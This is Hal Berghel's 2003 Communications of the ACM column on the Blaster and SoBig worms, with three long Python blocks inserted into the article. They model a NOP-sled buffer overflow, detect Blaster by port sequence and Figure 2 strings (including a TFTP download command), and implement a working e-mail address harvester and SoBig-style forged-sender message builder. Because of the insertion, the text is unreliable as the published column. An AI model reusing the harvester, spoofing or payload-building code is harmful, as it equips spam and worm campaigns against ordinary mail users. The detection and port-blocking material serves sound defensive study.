
Digital Village
Hal Berghel

Communications of the ACM, December 2003/Vol. 46, No. 12

Malware Month

August 2003: , W32/, and the month of the millennium.

August 2003 is officially the worst month on record for malware, according to vnunet.com. Of course, the creation and distribution of malware (malicious software) has been on a rapid rise for well over a decade. According to Carnegie Mellon's CERT Coordination Center (CERT/CC), the number of reported incidents rose from six in 1988 (the year of the Morris worm) to 82,094 in 2002, with 76,404 incidents reported in the first half of 2003 alone. The upward trend is unmistakable and frightening. But this past August exceeded everyone's wildest expectations and worst fears. Mi2g (Mi2g.com) estimates that $32.8 billion in economic damages were suffered in August 2003, the largest amount in the history of the Internet. These losses were produced by a variety of malware.

The table here, abridged from Symantec's Security Response Center online listing, illustrates the Windows vulnerabilities exploited during that week. My Windows-centric focus in this column is on the two entries in the table that started and ended the week: W32/Blaster and SoBig. A brief analysis of these two exploits provides considerable insight into the current hacker's modus operandi. It is important to emphasize that these exploits are Windows-centric because Symantec is a Windows security software and appliance vendor. The Unix world has its own cluster of vulnerabilities, although SoBig and W32/Blaster were not among them. However, Microsoft's hegemony in the desktop/workstation OS realm makes it the hacker target of choice.

W32/Blaster

W32/Blaster (aka LovSan, worm_msblast, Win32.Posa, W32Lovsan, MSBLASTER), in its myriad manifestations, is one of those exploits that will go down in the annals of Internet hacking as a giant thorn in the side of network security experts. Though the origin of this worm has yet to be identified, an 18-year-old Minnesota high school student has confessed to the FBI to releasing at least one of the modifications (W32/Lovesan.worm.b; see the table here) that infected more than 7,000 computers. Overall, more than 1.4 million computers worldwide have been affected by all W32/Blaster varieties since the original infection on August 11, 2003, according to Network Associates' Hackerwatch.org. Figure 1 depicts the daily spread of the infection during the week of August 11. The pattern is unforgettable and alarming.

However, the consequences of the W32/Blaster family of worms go far beyond the world of the Minnesota teenager. According to Computerworld, "The W32/Blaster worm may have contributed to the cascading effect of the August 14 blackout, government and industry experts revealed.... On the day of the blackout, Blaster degraded the performance of several communications lines linking key data centers used by utility companies to manage the power grid...." (Computerworld, Aug. 29, 2003). Some have suggested that Blaster interfered with the network exchange of flow-control and load-balancing information the power grid control systems require to coordinate responses to grid anomalies. While Blaster hasn't been blamed for the cascading blackout, some industry analysts have stated that "it certainly compounded the problems."

Figure 1. The spread of W32/Blaster-Lovsan during the week of Aug. 11, 2003. Note the peak of 68,000 newly infected IP addresses at 11 p.m. on Monday, Aug. 11. Source: Hackerwatch.org (hackerwatch.org/checkup/graph.asp).

The final word on the fate of the Minnesota high school student-cum-script kiddie has yet to be written. According to the Kansas City Star, Microsoft discovered this variant of the worm used a hard-coded download link to www.t33kid.com to download the primary malware executables. Internet registries linked this site to "teekid" who, at the time this column was written (fall 2003), faced 10 years in prison and a $250,000 fine.

So how does the W32/Blaster family of worms work? The ultimate objective was to launch a port 80 (the primary port for the Web) SYN flood distributed denial-of-service attack against Microsoft's windowsupdate.com site on August 16, 2003, based on a vulnerability discovered a month earlier in the Windows implementation of Remote Procedure Call (RPC). More specifically, the enabling vulnerability was a defect in Microsoft's interface between its Windows Distributed Component Object Model (DCOM) and RPC in Windows NT, 2000, XP, and 2003 Server. Like many OS vendors, Microsoft succumbed to the bête noire of modern programming: sloppy code. In this case, yet another instance of inadequate bounds checking led to the recurrence of the now-familiar buffer overflow category of vulnerabilities.

I've discussed buffer overflows in previous columns ("The Worm," Dec. 2001), so I won't go into detail here but to say that the compiler lays out local buffers on the execution stack alongside control data such as the saved return address. Thus, the word just past the end of the buffer is typically a pointer to the next instruction to execute (the saved return address) or some other code pointer. If one can overflow a buffer (made possible by a lack of bounds checking on the input data), one can substitute errant code, or a pointer to it, into that control data and thereby gain a point of entry for an exploit. One common variation of this hack is to overwrite the word right after the buffer's end with a pointer back into the buffer itself, which has been overwritten with a "no-op" sled followed by rogue code. In this case, one doesn't need to know the exact location of the rogue code in the buffer: as long as the pointer lands anywhere in the sled, the processor executes no-op instructions one after another until it reaches the first line of the rogue code. That line of code launches the exploit. In this case, since Microsoft's DCOM runs with local system privileges, the rogue code passed to it through hacked or "crafted" TCP/IP RPC packets will inherit those privileges. RPC is a protocol that enables cross-platform, interprocess communication. So if a crafted RPC packet from a hostile computer can corrupt the target's DCOM, the hostile computer can take over control of the target.
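The overflow-plus-sled mechanism just described, modelled in Python as an added example; this is not code from the column and not Blaster's exploit. The "frame" is a bytearray standing in for a real stack frame, and the buffer size, the 32-bit word width, the addresses and the stand-in code bytes are all assumptions; nothing is executed, the walk only shows where control would land after the corrupted return.

```python
"""Model of a stack-buffer overflow with a no-op sled (added illustration).
A frame is BUF_LEN bytes of buffer followed by the saved return word; the
vulnerable copy has no bounds check, so attacker bytes spill into that word."""

import struct

BUF_LEN = 16          # size of the local buffer (assumed)
WORD = 4              # width of the saved-return word (assumed 32-bit, as on NT/XP)
NOP = 0x90            # x86 one-byte no-op, the material of the "no-op sled"
CODE_MARK = 0xCC      # stand-in for the first byte of the rogue code


def new_frame(saved_ret: int) -> bytearray:
    """BUF_LEN bytes of buffer followed by the saved return word (little-endian)."""
    return bytearray(BUF_LEN) + struct.pack("<I", saved_ret)


def vuln_copy(frame: bytearray, data: bytes) -> None:
    """The defect: copies with no bounds check, so bytes past BUF_LEN overwrite
    the saved return word (stops at the frame's end only so the model stays in range)."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def safe_copy(frame: bytearray, data: bytes) -> bool:
    """The missing bounds check: refuse input that does not fit the buffer."""
    if len(data) > BUF_LEN:
        return False
    frame[:len(data)] = data
    return True


def saved_ret(frame: bytearray) -> int:
    return struct.unpack("<I", frame[BUF_LEN:BUF_LEN + WORD])[0]


def build_payload(code: bytes, fake_ret: int) -> bytes:
    """NOP sled, then the rogue code, then the pointer that lands exactly on the
    saved-return word and points back into the sled."""
    sled = bytes([NOP]) * (BUF_LEN - len(code))
    return sled + code + struct.pack("<I", fake_ret)


def sled_walk(frame: bytearray, pc: int) -> int:
    """What the CPU does after the corrupted return: execute no-ops one after
    another until the first non-NOP byte, which is where the rogue code starts."""
    while pc < BUF_LEN and frame[pc] == NOP:
        pc += 1
    return pc


def overflow_demo(buffer_base: int = 0x0012FF00, entry_guess: int = 5) -> dict:
    """Overflow the frame, then follow the corrupted return word. entry_guess is
    how far into the buffer the attacker's pointer lands: any offset inside the
    sled reaches the code, which is the reason for the sled. Past the sled it fails."""
    frame = new_frame(saved_ret=0x00401000)          # legitimate return address (assumed)
    code = bytes([CODE_MARK, 0x31, 0xC0])            # stand-in shellcode bytes
    payload = build_payload(code, buffer_base + entry_guess)
    vuln_copy(frame, payload)
    ret = saved_ret(frame)
    landing = sled_walk(frame, ret - buffer_base)    # address -> offset in the buffer
    return {
        "ret_clobbered": ret == buffer_base + entry_guess,
        "landing_offset": landing,
        "reached_code": landing < BUF_LEN and frame[landing] == CODE_MARK,
    }


def hardened_demo() -> dict:
    """Same payload against the checked copy: rejected, return word left intact."""
    frame = new_frame(saved_ret=0x00401000)
    payload = build_payload(bytes([CODE_MARK]), 0x0012FF05)
    accepted = safe_copy(frame, payload)
    return {"accepted": accepted, "ret_intact": saved_ret(frame) == 0x00401000}


if __name__ == "__main__":
    print(overflow_demo())
    print(overflow_demo(entry_guess=14))   # pointer past the sled: lands inside the code, not at its start
    print(hardened_demo())
```

The sled is what makes the exploit tolerant of guessing: with 13 bytes of no-ops, any of 13 candidate return values reaches the code, while a pointer that lands past the sled (entry_guess=14) lands mid-code and the model reports failure. The hardened copy is the one-line bounds check whose absence the column blames for the whole episode.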

Microsoft released a technical bulletin and patch on July 16, 2003, that addressed the vulnerability. But a patch only fixes the problem if it is installed. Therein lies the rub. The evidence suggests there were at least 1.4 million computer users who didn't bother to install the patch. Of course, one could have protected one's computer even without the patch if one only knew how the exploit worked. But fewer people read Microsoft's technical bulletin than installed the patch. The situation migrated from bad to worse in a hurry.

The W32/Blaster infection sequence was pretty straightforward. An already-infected computer uses basic port scanning to find hosts with TCP port 135 open (see "URL Pearls" at the end of this column for port listings). Port 135 is the port used by Microsoft to support RPC and Windows Messenger, among other things. Against such a host it sends the DCOM RPC exploit, a variation of the publicly circulated dcom.c exploit code, which opens a command shell listening on TCP port 4444 on the target. The infecting computer then connects to that shell and issues a TFTP download command (the "tftp -i %s GET %s" string in Figure 2, with the infecting computer's address filled in), whereupon the target opens a TFTP session to UDP port 69 on the infecting computer and downloads the actual worm executable. The Windows registry is then modified so that the worm autostarts (the "windows auto update" value under the Run key shown in Figure 2). At that point, the infected computer becomes an unwilling repeater, scanning for new targets itself and joining the distributed denial-of-service attack against the windowsupdate.com site.

DATE        EXPLOIT              TYPE           TARGET OF ATTACK
August 11   W32.Blaster.Worm     worm           Windows DCOM RPC
August 11   .WinShell.50.b                      Windows OS
August 12   W32.Randex.E         worm/trojan    Windows/Internet Relay Chat
August 12   W32.HLLW.Habrack     worm           Windows file sharing networks
August 13   W32.Blaster.B.Worm   worm           Windows DCOM RPC
August 13   W32.Blaster.C.Worm   worm           Windows DCOM RPC
August 13   VBS.Lembra@mm        worm           Microsoft Outlook
August 13   Backdoor.Beasty.H    trojan horse   Internet Explorer
August 14   Backdoor.Graybird.E  trojan horse   Windows security settings
August 14   W32.Kuskus.Worm      worm           Windows file sharing networks
August 14   W32.Randex.F         worm           Windows/Internet Relay Chat
August 14   W32.Randex.G         worm           Windows/Internet Relay Chat
August 15   W32.Bugsoft          worm           Microsoft Outlook
August 15   PWSteal.Lemir.C      trojan horse   Windows online games
August 15   Trojan.Analogx       trojan horse   Windows spoofed proxy server
August 16   W32.HLLW.SShydy.B    worm           Windows file sharing networks
August 16   W32.Randex.H         worm           Windows/Internet Relay Chat
August 16   W32.Dumaru@mm        worm/trojan    Windows/Internet Relay Chat
August 16   BAT.Randren          virus          Windows OS
August 18   W32..Worm            worm           Windows DCOM RPC and IIS
August 18   W32.Dinkdink.Worm    worm           Windows DCOM RPC
August 18   W32.Sobig.F@mm       worm           SMTP mass mailing worm

August 11–18, 2003: The bleakest week of malware month.

Some of the code strings that suggest W32/Blaster infection include those shown in Figure 2. The point is this. Even if one did not patch one's computer as Microsoft recommended, the data in the previous paragraph is more than enough to prevent the exploit from taking root. For example, leaving Microsoft's Server Message Block and NetBIOS ports (135–139, 445) open to the Internet is inherently risky. Standard security policy dictates closing them to all outside traffic at the firewall, or in the OS if no firewall is present. In addition, blocking inbound TCP port 4444 prevents the attacker from ever reaching the shell the exploit opens. Port 4444 lies in the range normally used for ephemeral ports, the client-side ports negotiated between client and server for outbound connections, rather than for any published service, so blocking inbound connections to it should have no ill effect on legitimate traffic.
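The infection sequence and the port policy above, turned into detection logic as an added example (not code from the column or from any vendor): it walks firewall log lines looking for an attacker that probed TCP/135, reached the TCP/4444 shell, and was then contacted back over UDP/69 by the victim; it reports which allowed events the column's block list would have dropped; and it scans a byte blob for the Figure 2 strings. The log format, the addresses and the sample lines are constructed here; the blocked-port list and the strings are the column's.

```python
"""W32/Blaster indicators: the 135 -> 4444 -> 69 network sequence, the port
policy the column recommends, and the Figure 2 host strings (added example)."""

from collections import defaultdict

# Ports the column says to close at the firewall (or in the OS): SMB/NetBIOS
# 135-139 and 445, the exploit's shell port 4444, and TFTP on 69.
BLOCKED_TCP = set(range(135, 140)) | {445, 4444}
BLOCKED_UDP = {69}

# Constructed firewall log (assumed format: time src dst proto dport action).
SAMPLE_LOG = """\
23:01:02 10.0.0.7 10.0.0.9 tcp 135 allow
23:01:03 10.0.0.7 10.0.0.9 tcp 4444 allow
23:01:05 10.0.0.9 10.0.0.7 udp 69 allow
23:02:10 10.0.0.20 10.0.0.9 tcp 80 allow
23:02:11 10.0.0.7 10.0.0.21 tcp 135 allow
23:02:12 10.0.0.7 10.0.0.21 tcp 4444 deny
"""


def parse(log: str):
    """Yield one dict per log line; the field layout is an assumption."""
    for line in log.splitlines():
        if not line.strip():
            continue
        t, src, dst, proto, dport, action = line.split()
        yield {"t": t, "src": src, "dst": dst, "proto": proto,
               "dport": int(dport), "action": action}


def blaster_sequences(log: str):
    """(attacker, victim) pairs that completed all three steps, in order:
    attacker->victim TCP/135, attacker->victim TCP/4444, then victim->attacker
    UDP/69 (the "tftp -i <attacker> GET" command was issued over the 4444 shell,
    so the TFTP request runs in the opposite direction)."""
    stage = defaultdict(int)            # (attacker, victim) -> steps seen so far
    hits = []
    for ev in parse(log):
        if ev["action"] != "allow":     # a dropped step breaks the chain
            continue
        key = (ev["src"], ev["dst"])
        if ev["proto"] == "tcp" and ev["dport"] == 135 and stage[key] == 0:
            stage[key] = 1
        elif ev["proto"] == "tcp" and ev["dport"] == 4444 and stage[key] == 1:
            stage[key] = 2
        elif ev["proto"] == "udp" and ev["dport"] == 69:
            back = (ev["dst"], ev["src"])   # victim -> attacker, so reverse it
            if stage[back] == 2:
                stage[back] = 3
                hits.append(back)
    return hits


def policy_violations(log: str):
    """Allowed events that the column's port policy would have dropped."""
    return [ev for ev in parse(log) if ev["action"] == "allow" and (
        (ev["proto"] == "tcp" and ev["dport"] in BLOCKED_TCP) or
        (ev["proto"] == "udp" and ev["dport"] in BLOCKED_UDP))]


# Host-side indicators taken from the column's Figure 2.
FIGURE2_STRINGS = [
    b"I just want to say LOVE YOU SAN!!",
    b"windowsupdate.com",
    b"tftp -i %s GET %s",
    b"windows auto update",
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
]


def figure2_matches(blob: bytes):
    """Figure 2 strings present in a file image or memory dump."""
    return [s.decode() for s in FIGURE2_STRINGS if s in blob]


if __name__ == "__main__":
    print("completed infections:", blaster_sequences(SAMPLE_LOG))
    print("policy would have dropped:", len(policy_violations(SAMPLE_LOG)), "events")
    sample_blob = b"\x00garbage tftp -i %s GET %s more windows auto update\x00"  # constructed
    print("Figure 2 strings found:", figure2_matches(sample_blob))
```

In the constructed log the second victim (10.0.0.21) is probed on 135 but the 4444 connection is denied, so no sequence completes against it: that is the column's point that blocking 4444 alone stops the exploit from being reached even on an unpatched host. Several of the Figure 2 strings (windowsupdate.com, the Run key path) occur in legitimate software too, so treat matches as leads to confirm, not verdicts.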


Another factor is that Blaster uses its own Trivial File Transfer Protocol (TFTP) client on port 69 (69/tcp is registered too, but TFTP runs over UDP) to download the worm. TFTP has no authentication at all and is an inherent risk, so this port should be blocked anyway. Finally, recognition of dcom.c and many of the code signatures was already included in the major anti-virus programs prior to August 11. The lesson to be learned from W32/Blaster is that one really had to have one's head in the sand to get infected in the first place.

Figure 2. Example code strings indicating W32/Blaster infection.

(the primary executable of the exploit)
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SoBig

As bad as W32/Blaster was, it paled in terms of the number of computers affected by SoBig (aka W32.Sobig.X@mm, where X is one of the alphabet varieties). According to vnunet.com, at its peak SoBig accounted for nearly 75% of all email traffic on the Internet. Vnunet adds that any one of the top four viruses and worms discovered in August 2003 would in itself have been the most significant exploit in an average month. To have four in one month, including W32/Blaster and SoBig, nearly brought some areas of the commercial Internet to a grinding halt. SoBig accounted for nearly 50% of the August 2003 malware exploits reported by many anti-virus vendors.

To make matters worse, SoBig has achieved the hacker holy grail of "most damaging malware in history" ($14.62 billion), surpassing ($13.94 billion) and Love Bug ($8.75 billion) according to the Mi2g SIPS database. Unlike W32/Blaster, the SoBig worm relies on email for propagation. The ubiquity of email makes SoBig especially pernicious.

SoBig's modus operandi combines address harvesting with "email spoofing": the email addresses are "harvested" from files on the compromised host with the following extensions: .dbx, .eml, .hlp, .htm, .html, .mht, .wab, and .txt. The email harvesting is performed with any of a number of simple approximate string matching algorithms in the public domain. These harvested email addresses are then used as forged return addresses in subsequent mass mailings. SoBig also relies on its own internal SMTP mail engine to propagate itself, so it doesn't have to concern itself about tightened security measures on the local SMTP servers. In this way, SoBig produces two victims: the compromised host, and the unsuspecting person whose email address was contained in one of the files on the compromised host and who subsequently receives hate email from the next target downstream.

Here's how it works. SoBig sends out an email message with the worm in what appears to be a harmless attachment. Relying on four fundamental principles of hacker social engineering, the spoofed email encourages the unsuspecting recipient to open the attachment: 1) the email appears to come from a real email address (stolen from the previous victim's files); 2) the email uses innocuous-seeming subject lines like "Details," "Approved," "Thank You!" (and "Re: Thank You!"), "Your Application," and of course pro forma variations for the curious and devil-may-care among us such as "Wicked screensaver" and "That Movie"; 3) the email contains non-threatening message bodies like "Please see the attached file for details"; and 4) the attachments use harmless-looking file names that appear to be non-executable, such as your_document.pif, document_all.pif, details.pif, and wicked_scr.scr (both .pif and .scr are run as programs by Windows, which is precisely why they were chosen). Added together, the social engineering was obviously quite successful.

When the attachment-cum-worm executes, it loads itself in the Windows installation folder as the 72K executable winppr32.exe along with a datafile winstt32.dat.
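The harvesting and the four social-engineering cues above, as an added example (not the worm's code and not from the column): a harvester that collects addresses only from files with the column's extension list, a builder that forges a SoBig-style message from a harvested address, and a scorer a mail gateway could apply to inbound mail. The file contents, addresses and message text are constructed here; the extensions, subjects, body phrase and attachment names are the column's.

```python
"""SoBig-style address harvesting and a matching inbound-mail scorer (added example)."""

import os
import re
from email.message import EmailMessage

HARVEST_EXTS = {".dbx", ".eml", ".hlp", ".htm", ".html", ".mht", ".wab", ".txt"}
SUBJECTS = {"Details", "Approved", "Thank You!", "Re: Thank You!", "Your Application",
            "Wicked screensaver", "That Movie"}
BODY_PHRASES = {"Please see the attached file for details"}
ATTACH_EXTS = (".pif", ".scr")      # both executed as programs by Windows

ADDR_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed files on a "compromised host": file name -> contents.
SAMPLE_FILES = {
    "inbox.dbx": b"From: alice@example.org\r\nTo: bob@example.net\r\n",
    "page.html": b'<a href="mailto:carol@example.com">Carol</a>',
    "notes.txt": b"call dave@example.org tomorrow",
    "photo.jpg": b"eve@example.org",          # not a harvested extension: skipped
}


def harvest(files: dict) -> set:
    """Addresses the worm would collect: only from files with the listed extensions."""
    found = set()
    for name, data in files.items():
        if os.path.splitext(name)[1].lower() in HARVEST_EXTS:
            found.update(m.decode() for m in ADDR_RE.findall(data))
    return found


def build_message(sender: str, recipient: str, subject: str, attachment_name: str,
                  body: str = "Please see the attached file for details") -> EmailMessage:
    """A SoBig-style message: the From is a harvested address, not the real origin."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, subject
    msg.set_content(body)
    msg.add_attachment(b"MZ\x90\x00",                     # constructed stand-in bytes
                       maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg


def sobig_score(msg: EmailMessage) -> int:
    """How many of the column's content cues the message carries (0-3): stock
    subject, stock body, and a .pif/.scr attachment. The fourth cue, a forged but
    genuine-looking From, cannot be judged from the headers alone and needs
    sender-authentication checks at the receiving relay."""
    score = 0
    if (msg["Subject"] or "") in SUBJECTS:
        score += 1
    body = msg.get_body(preferencelist=("plain",))
    if body is not None and body.get_content().strip() in BODY_PHRASES:
        score += 1
    names = [(p.get_filename() or "").lower() for p in msg.iter_attachments()]
    if any(n.endswith(ATTACH_EXTS) for n in names):
        score += 1
    return score


if __name__ == "__main__":
    addrs = harvest(SAMPLE_FILES)
    print("harvested:", sorted(addrs))
    worm_mail = build_message(sorted(addrs)[0], "bob@example.net", "Thank You!", "details.pif")
    print("worm-like message score:", sobig_score(worm_mail))
    benign = build_message("alice@example.org", "bob@example.net", "lunch", "agenda.pdf",
                           body="see you at noon")
    print("benign message score:", sobig_score(benign))
```

The harvester shows why the extension list matters: the address in photo.jpg never enters the pool, while every address in mailbox, address-book, help and web files does, which is what turns one infected machine into a supply of plausible forged senders. A gateway rule that quarantines at a score of 2 or more would have caught every SoBig sample described here while passing the benign message.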

The worm/install routine links this executable to the Windows registry by adding new values to registry keys within the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER registry groups so that winppr32.exe autostarts, all of which leave behind easily detectable hacker trails that form the signatures used by the anti-virus software and intrusion detection systems.

Conclusion

If there's a single lesson in this, it's that eternal vigilance is the best defense against malware. Malware month didn't have to happen: the techniques used in the two most prominent exploits covered here involved nothing particularly innovative. Both were easily preventable by maintaining Windows update patches and hotfixes provided by Microsoft and by following reasonable security policies for Windows computers. Remember the eight M's: Malware month of the millennium made monkeys of many more than Microsoft.

Hal Berghel (www.acm.org/hlb) is a professor and director of the School of Computer Science and director of the Center for Cybermedia Research at the University of Nevada, Las Vegas.

© 2003 ACM 0002-0782/03/1200 $5.00

URL PEARLS

The intellectual magnet for the past 15 years has been CERT/CC, a federally funded research center at Carnegie Mellon University. Originally a free-standing DARPA project, CERT/CC is now part of the University's Software Engineering Institute's Networked Systems Survivability Program. The CERT/CC Web site (www.cert.org/nav/index_main.html) is one of two core sites for anyone interested in vulnerabilities, incident handling, and reporting. The other mission-critical site is SANS Internet Storm Center (isc.sans.org/), a virtual cornucopia of data, references, analyses, and alerts. Taken together, CERT/CC and SANS ISC are the points of first contact for network intrusion and detection specialists.

Symantec is one of the leading providers of Windows security software in the computer industry. Its Security Response Center (securityresponse.symantec.com/avcenter/vinfodb.html) contains up-to-date information on known exploits, with links to vendor alerts, patches, and hotfixes.

The Kansas City Star coverage of W32/Lovesan.worm.b is available at www.kansascity.com/mld/kansascity/news/breaking_news/6655970.htm.

Vnunet.com's assessment of August 2003 as the worst month in history for virus and worm infection is available at www.vnunet.com/News/1143336 and www.vnunet.com/News/1143129.

The economic losses due to malware reported here are calculated by Mi2g (Mi2g.com) and reported on the Net-security Web site (net-security.org).

Another site to visit is Hackerwatch.org, which seems to be affiliated with or sponsored by McAfee Security of McAfee anti-virus renown. Special attention should be given to their animation of the spread of W32/Blaster_LovSan, a clever way of depicting the spread of the exploit. Their event maps are also of interest.

There are several databases of Internet port usage. You might find our version at ccr.i2.nscee.edu/port to be easier to use than most, so you might begin there to learn the nuances about Internet ports and services. It should be noted that the assignment of ports to services is based on an honor system to which the hackers do not subscribe; Blaster's use of port 4444 for its shell is a case in point.

Finally, technical information on the two exploits discussed here can be found on Carnegie Mellon's CERT Web site: Sobig.F Worm, www.cert.org/incident_notes/IN-2003-03.html; W32/Blaster worm, www.cert.org/advisories/CA-2003-20.html. Similar information is also available on Windows security vendors' sites and SANS.ORG.
